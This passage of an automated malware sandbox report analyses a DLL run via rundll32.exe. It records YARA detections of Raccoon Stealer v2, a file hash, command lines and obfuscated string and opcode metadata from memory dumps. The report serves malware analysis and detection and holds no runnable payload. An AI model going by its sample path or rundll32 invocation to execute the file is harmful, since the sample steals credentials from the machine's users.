                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000003.00000003.274090013.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000003.00000003.272568992.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high

                Target ID:4
                Start time:01:56:36
                Start date:10/02/2023
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",#1
                Imagebase:0x850000
                File size:61952 bytes
                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000004.00000003.271382455.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000004.00000003.271031641.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000004.00000002.278732555.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high

                Target ID:5
                Start time:01:56:47
                Start date:10/02/2023
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe "C:\Users\user\Desktop\B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dll",_Start@16
                Imagebase:0x850000
                File size:61952 bytes
                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000005.00000003.300509455.0000000003420000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000005.00000003.300634384.0000000003420000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                Reset < >

                  Execution Graph

                  Execution Coverage:0.1%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:3
                  Total number of Limit Nodes:0
                  execution_graph 3662 2e833e8 3663 2e833ee SetPriorityClass 3662->3663 3664 2e833f9 3663->3664

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 2e833e8-2e833f2 SetPriorityClass 2 2e833f9-2e83b81 0->2
                  APIs
                  • SetPriorityClass.KERNELBASE ref: 02E833EE
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID: ClassPriority
                  • String ID:
                  • API String ID: 2576577285-0
                  • Opcode ID: 7b53277efbc5150fe4e633cd7394f2ce98b7d8e9cb4909d53492027ea8ae1159
                  • Instruction ID: 3e591897f00fe8d1b67c54a0a350e29ec15cbcaed340b3623c5e3d1606f4f28e
                  • Opcode Fuzzy Hash: 7b53277efbc5150fe4e633cd7394f2ce98b7d8e9cb4909d53492027ea8ae1159
                  • Instruction Fuzzy Hash: E6C08C80CCC000E2C34031318865BF97B309B40A00F28F3E784FF840866A008C68C1C7
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000003.263799487.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_3_1390000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 21ccb7219ed62d1a2101e138c8ed2de490c2c7c47b76903fdde3888c8435532b
                  • Instruction ID: f8eff49e353100ad353ae7b955911a81d30f3249291715698dfb0f0059b89881
                  • Opcode Fuzzy Hash: 21ccb7219ed62d1a2101e138c8ed2de490c2c7c47b76903fdde3888c8435532b
                  • Instruction Fuzzy Hash: B8A0026105F30DD9EFDC441059F177F50ED430912CC5115273A9FA1C81D43851809D76
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 35 2eeef64-2eef4de 36 2eef4eb 35->36 37 2eef4e4-2eef4e6 35->37 38 2eef4ed-2eef783 36->38 37->38 39 2eef789-2eef78c 38->39 40 2eef791-2eef799 38->40 41 2eef79c-2eefa58 39->41 40->41 42 2eefa5e-2eefa60 41->42 43 2eefa65-2ef0173 41->43 42->43 44 2ef017e-2ef0184 43->44 45 2ef0179 43->45 46 2ef018a-2ef0590 call 2ef0592 44->46 45->46
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: CCBC$ObO]$f(L$x^xn$7i~$:[t$pb)$s$t
                  • API String ID: 0-3980285888
                  • Opcode ID: b65e8c742a05da8bd83523605f8c5833c5510dd9f49ab91ee27a6e4efde28628
                  • Instruction ID: 0b48f101332ad2e837a92a809ab2ee914cc806c6a478a7f1043eb1e988f73abc
                  • Opcode Fuzzy Hash: b65e8c742a05da8bd83523605f8c5833c5510dd9f49ab91ee27a6e4efde28628
                  • Instruction Fuzzy Hash: 40D2A1B6A057218FC304CF5ED8844C1B7E6FBC836476A827ED519EB355DBB1990B8B80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 49 2eeba8e-2eec4aa 50 2eec4b5 49->50 51 2eec4b0 49->51 52 2eec4b8-2eec83c 50->52 51->52 53 2eec84e-2eec89b call 2eec89d 52->53 54 2eec842-2eec84b 52->54 54->53
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: 2[N:$@q.q$C*DC$C/3.$R5]0$__`"$w,wJ$wl<b
                  • API String ID: 0-10248119
                  • Opcode ID: e653cc68aaf1e4c43a49f031ffd2ebfb11e96c7feeabca8dd6756fd3ab63ba10
                  • Instruction ID: d03da2c14667fb4b8b0fe5570af97c276d8b247f4f3814a32eea48e45a6a9b0b
                  • Opcode Fuzzy Hash: e653cc68aaf1e4c43a49f031ffd2ebfb11e96c7feeabca8dd6756fd3ab63ba10
                  • Instruction Fuzzy Hash: 6682C673A007258FC314CF5ED880691B7E6BBCC254B6A867BD418EF755DBB1690B8B80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 57 2ef1117-2ef12a0 58 2ef12a8-2ef1c98 57->58 59 2ef12a6 57->59 61 2ef1ca3-2ef1ca6 58->61 62 2ef1c9e call 2ef1ca8 58->62 59->58 62->61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: >rNr$MD}R$[[g$\>M>$t's'$w$3u$i$.'
                  • API String ID: 0-2590615654
                  • Opcode ID: bfea290f804fe1d3dc588bf12d3c5662b207e5efc3d5172e8068f83bc92358dc
                  • Instruction ID: 6b0bcadec4d43f61435b99c17745abeabdb6d7cf3a6b3b5d1aec9e4a4c6cc0b2
                  • Opcode Fuzzy Hash: bfea290f804fe1d3dc588bf12d3c5662b207e5efc3d5172e8068f83bc92358dc
                  • Instruction Fuzzy Hash: E562B372A006258FD304CF6ED8848C1B7E6BBC836475A437FD919DF355EBB1990A8B80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 63 2eecde3-2eed13b 64 2eed144-2eed2ab 63->64 65 2eed141 63->65 66 2eed2b6-2eed2c3 64->66 67 2eed2b1 64->67 65->64 68 2eed2c5-2eed6d3 66->68 67->68 70 2eed6d9-2eed6db 68->70 71 2eed6e0-2eed6e6 68->71 72 2eed6ec-2eed7df call 2eed7f4 call 2eed7ee call 2eed7e5 70->72 71->72
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: %i=F$*9"9$GXV$QcP3$kTk@$=S>$hD
                  • API String ID: 0-2739446133
                  • Opcode ID: 75f4f6aef2253009fc0d153d5b8f458fd4b4260d155f86fb85bcfac832bfcb01
                  • Instruction ID: db5fde6fab08b609c8c891f5779f61dcdb77be515028ce71498c4eeb2b79214b
                  • Opcode Fuzzy Hash: 75f4f6aef2253009fc0d153d5b8f458fd4b4260d155f86fb85bcfac832bfcb01
                  • Instruction Fuzzy Hash: 9842A176A006218FC308CF5ED8845C1B7E6BBC836476A827BD919EB355D7B1994B8BC0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 79 2eeacc7-2eeade4 80 2eeadef 79->80 81 2eeadea 79->81 82 2eeadf2-2eeb351 80->82 81->82 83 2eeb359-2eeb380 82->83 84 2eeb357 82->84 84->83
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: (xU$<G,$C/t7$M8H8$R:Q&$c+=
                  • API String ID: 0-69612428
                  • Opcode ID: 0275f0da5da625e95c128dad55d552cc50bde1a4fc12e7348042d6a05939d4f8
                  • Instruction ID: 20dde49844e10d045089c0b56403d5daa971e2a32a046fd0d474ff90510188ca
                  • Opcode Fuzzy Hash: 0275f0da5da625e95c128dad55d552cc50bde1a4fc12e7348042d6a05939d4f8
                  • Instruction Fuzzy Hash: 1002B573A017258FC354CF1EC880681B7E6BBC9268B5A877FD429DB355DBB1590A8BC0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 85 2ef0711-2ef076d 86 2ef077b-2ef077e 85->86 87 2ef0773-2ef0776 85->87 88 2ef0781-2ef07fe 86->88 87->88 89 2ef080c-2ef0987 88->89 90 2ef0804-2ef0807 88->90 91 2ef098d-2ef0990 89->91 92 2ef0995-2ef0c0e 89->92 90->89 91->92 93 2ef0c1f-2ef0c21 92->93 94 2ef0c14-2ef0c1a 92->94 95 2ef0c23-2ef1115 call 2ef1117 93->95 94->95
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: &8f9$:4C$J4+4$`z|^
                  • API String ID: 0-1598808926
                  • Opcode ID: 5b22c598e08b8ffaf459787e4b9bf8ef4ffd912190c7ff1bf75dc6d3a12f10d4
                  • Instruction ID: a257c5d35315b7a7803c24a91b4ace6f4ba7b47a70902e3512a420438bf7e57a
                  • Opcode Fuzzy Hash: 5b22c598e08b8ffaf459787e4b9bf8ef4ffd912190c7ff1bf75dc6d3a12f10d4
                  • Instruction Fuzzy Hash: CC42C076A056218FC304CF2ED8805C1B7EABBC936076A837FD519DB755E7B1990A8B80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 98 2ef1ca8-2ef1d96 99 2ef1d9f-2ef22e8 call 2ef22ee 98->99 100 2ef1d9c 98->100 100->99
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: >2C$wA.$F~>
                  • API String ID: 0-57646770
                  • Opcode ID: 3b942797abc11e8531bcf8d9e57b4c4a4b63a859d939fbc2961e5b46d7135da8
                  • Instruction ID: f9b22cf7c54ea8de0ae0e9c527bcb2fb0db3bee7716972c1a21b4b8f3749ec2e
                  • Opcode Fuzzy Hash: 3b942797abc11e8531bcf8d9e57b4c4a4b63a859d939fbc2961e5b46d7135da8
                  • Instruction Fuzzy Hash: FBF19277A056618FC304CF1ED8804D5B7EABBC836476A867BD828EB355D7B19D078B80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 103 2eee4fe-2eee7a2 104 2eee7ab-2eeea26 call 2eeea2d 103->104 105 2eee7a8 103->105 105->104
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: ZV4T$h&h6$:S;
                  • API String ID: 0-3088005137
                  • Opcode ID: bbcf071527c2431fe1a9faad20f62b041f2676cec3732985406e84596dfb7456
                  • Instruction ID: 198479f6ddab17de2f5b4736b42d4c3cfbf21ef7565a0239ae6f61244556e403
                  • Opcode Fuzzy Hash: bbcf071527c2431fe1a9faad20f62b041f2676cec3732985406e84596dfb7456
                  • Instruction Fuzzy Hash: E1D19F77A016218FC704CF5E98805C1B7E6BBCC36476A837AD919EF365D7B1690B8B80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: <7B7$LL
                  • API String ID: 0-4036341623
                  • Opcode ID: d0e1559f2ca39387956765cde8a652e0b586ca07adc0bf86f830665ae7305b88
                  • Instruction ID: 73a739f40ee84443904b01e37087b7ade60302d33f32c33319e877cccd665b31
                  • Opcode Fuzzy Hash: d0e1559f2ca39387956765cde8a652e0b586ca07adc0bf86f830665ae7305b88
                  • Instruction Fuzzy Hash: E5528FB2A007218FD304CF1ED8885C1B7E6BB9C31476A867BD919DB356D7B1690BCB80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: *~;R$4m&
                  • API String ID: 0-2160792659
                  • Opcode ID: f836f2a2070fdf950b4d7943f4d7cd81b26c1321e6a383ea9d26f57ca1a4c708
                  • Instruction ID: 84e28985f46464a60b52d901b4634b325f0ee8134f76ce650b13014a23842c56
                  • Opcode Fuzzy Hash: f836f2a2070fdf950b4d7943f4d7cd81b26c1321e6a383ea9d26f57ca1a4c708
                  • Instruction Fuzzy Hash: E1129672A006258FD714CF1DD8809C5B7E6BBC8214B6A877FD419EF355DBB1690ACB80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: 7i~
                  • API String ID: 0-167345846
                  • Opcode ID: 2babdb99ce59ab2327dcbe3f6110a49b5c63ad149cb3c3d707968ff28a8ba9fe
                  • Instruction ID: 9fbb2be4a0f4719a885d8d2bc2490ede6259518f60514aae886ee04aae9064a5
                  • Opcode Fuzzy Hash: 2babdb99ce59ab2327dcbe3f6110a49b5c63ad149cb3c3d707968ff28a8ba9fe
                  • Instruction Fuzzy Hash: D602A372A127218FC304CF6ED8904D1B7E5ABCD36476A427FD518EB355D7B1990B8B80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: 2/M
                  • API String ID: 0-1775204645
                  • Opcode ID: 4e552a73ffaee9d33164257fcee2b83fde87fe9f893af45876c4311feac39ba7
                  • Instruction ID: 860dd4318b779a040cce112e6c56b85ed3a12f00567cc7ad7051bd92cd8c0596
                  • Opcode Fuzzy Hash: 4e552a73ffaee9d33164257fcee2b83fde87fe9f893af45876c4311feac39ba7
                  • Instruction Fuzzy Hash: BDE1B176A016268FC304CF5EC8C04D5B7EABBC8350B5A827BD518EB755DBB1991A8BC0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 88f2ccc09467e90549c9a869b33abd1414bb129d85eb8e9b47aa8795e73edb1a
                  • Instruction ID: b5e74dcb131cd35a50974c55f0825a83808e3afb7049225ad58135dd8139ea12
                  • Opcode Fuzzy Hash: 88f2ccc09467e90549c9a869b33abd1414bb129d85eb8e9b47aa8795e73edb1a
                  • Instruction Fuzzy Hash: 5BC17D76A016268FC304CF1ED8844E5B7E6BBCC36476A827F951CEB365DB71590B8B80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ef4b8139036bde884658efafee6d0aac63caefa8957592ad2faf53089e0d855b
                  • Instruction ID: 3797fcc6d453e0d3236df187906941d31a61c15b5e1fb35cf08efc2d914c40ea
                  • Opcode Fuzzy Hash: ef4b8139036bde884658efafee6d0aac63caefa8957592ad2faf53089e0d855b
                  • Instruction Fuzzy Hash: 5D715F7684F3D15FD7538B388865182BFB0AE1712832E86DFC4C58F4A3D22A684AC753
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 64979ac2761ea50804d7e1d106e4adcd976122de26855399d639b45b64d8e863
                  • Instruction ID: 4209747ff33dd99cecd67df9d2e025704cc6d2f6f542e5a68520d181ee83eecf
                  • Opcode Fuzzy Hash: 64979ac2761ea50804d7e1d106e4adcd976122de26855399d639b45b64d8e863
                  • Instruction Fuzzy Hash: D7717272A107254FC304CF6A94804C2B7E6BBCC76476A837FD829EB755D7B05A0B8B80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b39153c914fa4e69edcf238cfc2eccef564aa25f40efc89133ddaa141f39b5f2
                  • Instruction ID: a7628a0fc9131864b5de68672bee613e22915568ac430fed25f6b24fc1c3c44f
                  • Opcode Fuzzy Hash: b39153c914fa4e69edcf238cfc2eccef564aa25f40efc89133ddaa141f39b5f2
                  • Instruction Fuzzy Hash: 3C31A6702807039BEF38AA6988487D6B7A2BB4530CF10E627D5AECB655D330B585DE94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8670d6256f363f4d8daecd2fe8965ed4105778edc905b12edc6156614ff4266d
                  • Instruction ID: dbda25b3f0ae84575a4b62d4d1e3080013900f2acd44dfaa5b8522e480e57a4a
                  • Opcode Fuzzy Hash: 8670d6256f363f4d8daecd2fe8965ed4105778edc905b12edc6156614ff4266d
                  • Instruction Fuzzy Hash: 8C21C471A04F9797CF668E65C900286F3A1FFD521CF14991ACD8D87A00E739E66CD7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.266155920.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e80000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5328ba3e7afa7ef06a4e01f163d1be1236c869c68fff62eb87aaff28a596b0b5
                  • Instruction ID: 8acaae482fca988b2aaac8e7b2faf820cd8bee437cf00d90824d91443c2aea80
                  • Opcode Fuzzy Hash: 5328ba3e7afa7ef06a4e01f163d1be1236c869c68fff62eb87aaff28a596b0b5
                  • Instruction Fuzzy Hash: A431B376D14F8643EB264B3C89412A6F761FFEA118F29EB39EDC562A01E724A154D280
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000003.00000003.245086603.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_3_31b0000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4d31e7a73f49ce29eee05feebf91c80df513dcdc7aa22de300fb58e594852902
                  • Instruction ID: d16a87914844c68c32e960e14723a646d520a650cc5d13fa6e1114d93cd7ba26
                  • Opcode Fuzzy Hash: 4d31e7a73f49ce29eee05feebf91c80df513dcdc7aa22de300fb58e594852902
                  • Instruction Fuzzy Hash: 6DC08C2284D704DFEB8CC6808CC04FB32346B0E290703008BE10B2100AA75009C4C313
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000003.00000003.245086603.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_3_31b0000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1cbda2af17a631448eb9499d5279f26075eaaa39fc7b9a9e516ba58286a6b248
                  • Instruction ID: 5c0ae24e21064c1ec5de04791713af4f7258cf8bb90a0406653250b23ad5d120
                  • Opcode Fuzzy Hash: 1cbda2af17a631448eb9499d5279f26075eaaa39fc7b9a9e516ba58286a6b248
                  • Instruction Fuzzy Hash: 7CA0029A92E245D7E69DE1608C454FF0034064EA75703014BD22B544182F9015C04457
                  Uniqueness

                  Uniqueness Score: -1.00%